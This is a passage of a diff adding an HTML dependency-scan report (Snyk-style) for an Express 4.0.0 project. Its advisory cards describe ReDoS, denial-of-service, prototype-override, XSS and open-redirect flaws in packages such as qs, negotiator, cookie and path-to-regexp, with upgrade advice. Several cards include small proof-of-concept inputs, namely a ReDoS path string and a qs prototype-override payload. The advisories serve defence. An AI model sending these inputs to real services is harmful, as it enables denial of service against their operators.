the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>fresh</code> to version 0.5.2 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/jshttp/fresh/commit/21a0f0c2a5f447e0d40bc16be0c23fa98a7b46ec" target="_blank" rel="noopener noreferrer">https://github.com/jshttp/fresh/commit/21a0f0c2a5f447e0d40bc16be0c23fa98a7b46ec</a></li><li><a href="https://github.com/jshttp/fresh/issues/24" target="_blank" rel="noopener noreferrer">https://github.com/jshttp/fresh/issues/24</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:fresh:20170908" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">101</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:negotiator:20160616</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> negotiator@0.3.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; accepts@1.0.0 &#x203A; negotiator@0.3.0</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://npmjs.org/package/negotiator" target="_blank" rel="noopener noreferrer">negotiator</a> is an HTTP content negotiator for Node.js.</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS)</p><p>when parsing <code>Accept-Language</code> http header.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>negotiator</code> to version 0.6.1 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/jshttp/negotiator/commit/26a05ec15cf7d1fa56000d66ebe9c9a1a62cb75c" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul><ul><li><a href="https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS" target="_blank" rel="noopener noreferrer">OWASP Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:negotiator:20160616" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">105</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:qs:20140806</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> qs@0.6.6</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; qs@0.6.6</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/qs" target="_blank" rel="noopener noreferrer">qs</a> is a querystring parser that supports nesting and arrays, with a depth limit.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS).</p><p>During parsing, the <code>qs</code> module may create a sparse area (an array where no elements are filled), and grow that array to the necessary size based on the indices used on it. An attacker can specify a high index value in a query string, thus making the server allocate a respectively big array. Truly large values can cause the server to run out of memory and cause it to crash - thus enabling a Denial-of-Service attack.</p><h2>Remediation</h2><p>Upgrade <code>qs</code> to version 1.0.0 or higher.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>References</h2><ul><li><a href="https://github.com/tj/node-querystring/pull/114/commits/43a604b7847e56bba49d0ce3e222fe89569354d8" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul><ul><li><a href="https://github.com/visionmedia/node-querystring/issues/104" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul><ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2014-7191" target="_blank" rel="noopener noreferrer">NVD</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:qs:20140806" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">101</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Prototype Override Protection Bypass</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:qs:20170213</li>
+      <li class="card-meta-item">CWE-20</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> qs@0.6.6</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; qs@0.6.6</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/qs" target="_blank" rel="noopener noreferrer">qs</a> is a querystring parser that supports nesting and arrays, with a depth limit.</p><p>Affected versions of this package are vulnerable to Prototype Override Protection Bypass. By default <code>qs</code> protects against attacks that attempt to overwrite an object&#39;s existing prototype properties, such as <code>toString()</code>, <code>hasOwnProperty()</code>,etc.</p><p>From <a href="https://github.com/ljharb/qs" target="_blank" rel="noopener noreferrer"><code>qs</code> documentation</a>:</p><p>&gt; By default parameters that would overwrite properties on the object prototype are ignored, if you wish to keep the data from those fields either use plainObjects as mentioned above, or set allowPrototypes to true which will allow user input to overwrite those properties. WARNING It is generally a bad idea to enable this option as it can cause problems when attempting to use the properties that have been overwritten. Always be careful with this option.</p><p>Overwriting these properties can impact application logic, potentially allowing attackers to work around security controls, modify data, make the application unstable and more.</p><p>In versions of the package affected by this vulnerability, it is possible to circumvent this protection and overwrite prototype properties and functions by prefixing the name of the parameter with <code>[</code> or <code>]</code>. e.g. <code>qs.parse(&#34;]=toString&#34;)</code> will return <code>{toString = true}</code>, as a result, calling <code>toString()</code> on the object will throw an exception.</p><p><strong>Example:</strong></p><pre><code>qs.parse(&#39;toString=foo&#39;, { allowPrototypes: false })
+// {}
+
+qs.parse(&#34;]=toString&#34;, { allowPrototypes: false })
+// {toString = true} &lt;== prototype overwritten
+</code></pre><p>For more information, you can check out our <a href="https://snyk.io/blog/high-severity-vulnerability-qs/" target="_blank" rel="noopener noreferrer">blog</a>.</p><h2>Disclosure Timeline</h2><ul><li>February 13th, 2017 - Reported the issue to package owner.</li><li>February 13th, 2017 - Issue acknowledged by package owner.</li><li>February 16th, 2017 - Partial fix released in versions <code>6.0.3</code>, <code>6.1.1</code>, <code>6.2.2</code>, <code>6.3.1</code>.</li><li>March 6th, 2017     - Final fix released in versions <code>6.4.0</code>,<code>6.3.2</code>, <code>6.2.3</code>, <code>6.1.2</code> and <code>6.0.4</code></li></ul><h2>Remediation</h2><p>Upgrade <code>qs</code> to version 6.0.4, 6.1.2, 6.2.3, 6.3.2 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/ljharb/qs/commit/beade029171b8cef9cee0d03ebe577e2dd84976d" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/ljharb/qs/issues/200" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:qs:20170213" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">34</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Cross-site Scripting (XSS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-COOKIE-8163060</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> cookie@0.1.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; cookie@0.1.0</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the cookie <code>name</code>, <code>path</code>, or <code>domain</code>, which can be used to set unexpected values to other cookie fields.</p><h2>Workaround</h2><p>Users who are not able to upgrade to the fixed version should avoid passing untrusted or arbitrary values for the cookie fields and ensure they are set by the application instead of user input.</p><h2>Details</h2><p>Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.</p><p>This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML)  in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.</p><p>Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.</p><p>Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <code>&lt;</code> can be coded as  <code>&amp;lt</code>; and <code>&gt;</code> can be coded as <code>&amp;gt</code>; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <code>&lt;</code> and <code>&gt;</code> as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.</p><p>The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.</p><h3>Types of attacks</h3><p>There are a few methods by which XSS can be manipulated:</p><table><thead><tr><th>Type</th><th>Origin</th><th>Description</th></tr></thead><tbody><tr><td><strong>Stored</strong></td><td>Server</td><td>The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.</td></tr><tr><td><strong>Reflected</strong></td><td>Server</td><td>The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.</td></tr><tr><td><strong>DOM-based</strong></td><td>Client</td><td>The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.</td></tr><tr><td><strong>Mutated</strong></td><td></td><td>The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.</td></tr></tbody></table><h3>Affected environments</h3><p>The following environments are susceptible to an XSS attack:</p><ul><li>Web servers</li><li>Application servers</li><li>Web application environments</li></ul><h3>How to prevent</h3><p>This section describes the top best practices designed to specifically protect your code:</p><ul><li>Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.</li><li>Convert special characters such as <code>?</code>, <code>&amp;</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code> and spaces to their respective HTML or URL encoded equivalents.</li><li>Give users the option to disable client-side scripts.</li><li>Redirect invalid requests.</li><li>Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.</li><li>Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.</li><li>Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.</li></ul><h2>Remediation</h2><p>Upgrade <code>cookie</code> to version 0.7.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/jshttp/cookie/pull/167" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2316549" target="_blank" rel="noopener noreferrer">Red Hat Bugzilla Bug</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-COOKIE-8163060" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">74</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Open Redirect</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-EXPRESS-6474509</li>
+      <li class="card-meta-item">CWE-601</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> express@4.0.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/expressjs/express" target="_blank" rel="noopener noreferrer">express</a> is a minimalist web framework.</p><p>Affected versions of this package are vulnerable to Open Redirect due to the implementation of URL encoding using <code>encodeurl</code> before passing it to the <code>location</code> header. This can lead to unexpected evaluations of malformed URLs by common redirect allow list implementations in applications, allowing an attacker to bypass a properly implemented allow list and redirect users to malicious sites.</p><h2>Remediation</h2><p>Upgrade <code>express</code> to version 4.19.2, 5.0.0-beta.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/expressjs/express/commit/0b746953c4bd8e377123527db11f9cd866e39f94" target="_blank" rel="noopener noreferrer">Github Commit</a></li><li><a href="https://github.com/expressjs/express/commit/0867302ddbde0e9463d0564fea5861feb708c2dd" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/koajs/koa/issues/1800" target="_blank" rel="noopener noreferrer">Github Issue</a></li><li><a href="https://github.com/expressjs/express/pull/5551" target="_blank" rel="noopener noreferrer">GitHub PR</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-EXPRESS-6474509" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">75</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Cross-site Scripting</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-EXPRESS-7926867</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> express@4.0.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/expressjs/express" target="_blank" rel="noopener noreferrer">express</a> is a minimalist web framework.</p><p>Affected versions of this package are vulnerable to Cross-site Scripting due to improper handling of user input in the <code>response.redirect</code> method. An attacker can execute arbitrary code by passing malicious input to this method.</p><p><strong>Note</strong></p><p>To exploit this vulnerability, the following conditions are required:</p><p>1) The attacker should be able to control the input to <code>response.redirect()</code></p><p>2) express must not redirect before the template appears</p><p>3) the browser must not complete redirection before:</p><p>4) the user must click on the link in the template</p><h2>Remediation</h2><p>Upgrade <code>express</code> to version 4.20.0, 5.0.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-EXPRESS-7926867" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">57</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-PATHTOREGEXP-7925106</li>
+      <li class="card-meta-item">CWE-1333</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> path-to-regexp@0.1.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; path-to-regexp@0.1.2</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when including multiple regular expression parameters in a single segment, which will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>, if two parameters within a single segment are separated by a character other than a <code>/</code> or <code>.</code>. Poor performance will block the event loop and can lead to a DoS.</p><p><strong>Note:</strong></p><p>While the 8.0.0 release has completely eliminated the vulnerable functionality, prior versions that have received the patch to mitigate backtracking may still be vulnerable if custom regular expressions are used. So it is strongly recommended for regular expression input to be controlled to avoid malicious performance degradation in those versions. This behavior is enforced as of version 7.1.0 via the <code>strict</code> option, which returns an error if a dangerous regular expression is detected.</p><h2>Workaround</h2><p>This vulnerability can be avoided by using a custom regular expression for parameters after the first in a segment, which excludes <code>-</code> and <code>/</code>.</p><h2>PoC</h2><pre><code>/a${&#39;-a&#39;.repeat(8_000)}/a
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>path-to-regexp</code> to version 0.1.10, 1.9.0, 3.3.0, 6.3.0, 8.0.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li>[GitHub Commit](https://github.com/p</li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-PATHTOREGEXP-7925106" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">61</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-PATHTOREGEXP-8482416</li>
+      <li class="card-meta-item">CWE-1333</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> path-to-regexp@0.1.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; path-to-regexp@0.1.2</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when including multiple regular expression parameters in a single segment, when the separator is not <code>.</code> (e.g. no <code>/:a-:b</code>). Poor performance will block the event loop and can lead to a DoS.</p><p><strong>Note:</strong></p><p>This issue is caused due to an incomplete fix for <a href="https://security.snyk.io/vuln/SNYK-JS-PATHTOREGEXP-7925106" target="_blank" rel="noopener noreferrer">CVE-2024-45296</a>.</p><h2>Workarounds</h2><p>This can be mitigated by avoiding using two parameters within a single path segment, when the separator is not <code>.</code> (e.g. no <code>/:a-:b</code>). Alternatively, the regex used for both parameters can be defined to ensure they do not overlap to allow backtracking.</p><h2>PoC</h2><pre><code>/a${&#39;-a&#39;.repeat(8_000)}/a
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
